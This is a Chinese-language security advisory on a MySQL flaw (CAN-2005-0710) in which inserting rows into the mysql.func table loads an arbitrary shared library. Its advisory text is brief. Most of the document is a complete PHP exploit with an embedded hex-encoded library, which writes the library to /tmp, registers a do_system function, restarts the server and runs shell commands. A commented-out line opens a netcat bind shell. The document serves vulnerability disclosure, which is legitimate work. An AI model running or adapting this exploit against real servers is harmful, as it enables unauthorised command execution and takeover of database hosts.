首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第57期->最新漏洞
期刊号: 类型: 关键词:
MySQL CREATE FUNCTION功能mysql.func表允许注入任意函数库漏洞

日期:2005-04-04

发布日期:2005-03-14
更新日期:2005-03-14

受影响系统:
MySQL AB MySQL 4.1.5
MySQL AB MySQL 4.1.4
MySQL AB MySQL 4.1.3-beta
MySQL AB MySQL 4.1.3-0
MySQL AB MySQL 4.1.2-alpha
MySQL AB MySQL 4.1.0-alpha
MySQL AB MySQL 4.1.0-0
MySQL AB MySQL 4.0.9-gamma
MySQL AB MySQL 4.0.9
MySQL AB MySQL 4.0.8-gamma
MySQL AB MySQL 4.0.8
MySQL AB MySQL 4.0.7-gamma
MySQL AB MySQL 4.0.7
MySQL AB MySQL 4.0.6
MySQL AB MySQL 4.0.5a
MySQL AB MySQL 4.0.5
MySQL AB MySQL 4.0.4
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.21
MySQL AB MySQL 4.0.20
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.18
MySQL AB MySQL 4.0.15
MySQL AB MySQL 4.0.14
MySQL AB MySQL 4.0.13
MySQL AB MySQL 4.0.12
MySQL AB MySQL 4.0.11-gamma
MySQL AB MySQL 4.0.11
MySQL AB MySQL 4.0.10
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0.0
不受影响系统:
MySQL AB MySQL 4.1.10a
MySQL AB MySQL 4.0.24
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 12781
CVE(CAN) ID: CAN-2005-0710

MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL数据库的CREATE FUNCTION命令用于在MySQL中实现用户自定义函数的管理,MySQL对于用户提交的自定义函数库名的路径处理上存在漏洞,拥有数据库管理员权限的用户可能利用漏洞在运行MySQL数据库的主机上以MySQL进程的权限执行任意指令。

MySQL虽然在执行CREATE FUNCTION命令时对用户指定的函数库名做了检查,但对实现类似功能的对'mysql.func'表的插入操作时没有对参数做相应的检查,如果经过认证的用户对MySQL管理数据库'mysql'拥有INSERT和DELETE的权限的话,就可能通过直接在'mysql.func'表中插入数据绕过对函数库名安全性的检查,从而通过让MySQL执行恶意的函数库而执行任意指令。

<*来源:Stefano Di Paola (stefano@dipaola.wisec.it)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111065974004648&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

["exp2.php" (exp2.php)]

<?
/*************************************
**  Mysql CREATE FUNCTION func table arbitrary library injection
**
**  Author: Stefano Di Paola
**  Vulnerable: Mysql <= 4.0.23, 4.1.10
**  Type of Vulnerability: Local/Remote Privileges Escalation  - input validation
**  Tested On : Mandrake 10.1 /Debian Sarge
**  Vendor Status: Notified on March 2005
**
**  Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
**
**  
** Disclaimer:
**  In no event shall the author be liable for any damages
**  whatsoever arising out of or in connection with the use
**  or spread of this information.
**  Any use of this information is at the user's own risk.
**
**
*************************************
*/


// this is the MySql root password.
$pass='useyoupasswordhere';

function mysql_create_db($db,$link)
{
$query="CREATE database $db;";
return  mysql_query($query, $link) ;
  
}
// the library in little endian hex. (from NGS's Hackproofing_MySql \
http://www.nextgenss.com/papers/HackproofingMySQL.pdf ) \
$solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
0000000000000100000000000000";


$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
   die('Could not connect: ' . mysql_error());
}
echo "Connected successfully as root\n";
echo "creating db for lib\n";
mysql_create_db('my_db',$link)  or print ('cannot create my_db db, sorry!');
echo "done....\n";
echo "selecting db for lib\n";
mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
echo "done....\n";

echo "creating blob table for lib\n";
$query="CREATE TABLE blob_tab (blob_col BLOB);";
$result = mysql_query($query, $link) or print("cannot  create blob table for lib\n");
echo "done....\n";

echo "inserting blob table for lib\n";
$query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
$result = mysql_query($query, $link) or print("cannot  insert blob for lib\n");
echo "done....\n";

echo "dumping lib in /tmp/libso.so.0...\n";
$query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
$result = mysql_query($query, $link) or print("cannot  dump lib\n");
echo " done....\n";

mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
echo "sending lib....\n";

$query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
$result = mysql_query($query, $link);
echo "done....\n";
echo "Creating exit function to restart server\n";

$query="create function exit returns integer soname 'libc.so.6';";
$result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
echo "done....\n";
echo "Selecting exit function\n";

$query="select exit();";
$result = mysql_query($query, $link);
echo "done!\nWaiting for server to restart\n";

sleep(1);

$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
   die('Could not connect: ' . mysql_error());
}
echo "Connected to MySql server again...\n";

//$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
$cmd ='id >/tmp/id';
echo "Sending Command...$cmd\n";
$query="select do_system('$cmd');";
$result = mysql_query($query, $link);
echo "done!\n";
echo "Now use your fav shell and ls /tmp/id -l \n";
mysql_close($link);

?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mysql.com/

版权所有,未经许可,不得转载
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客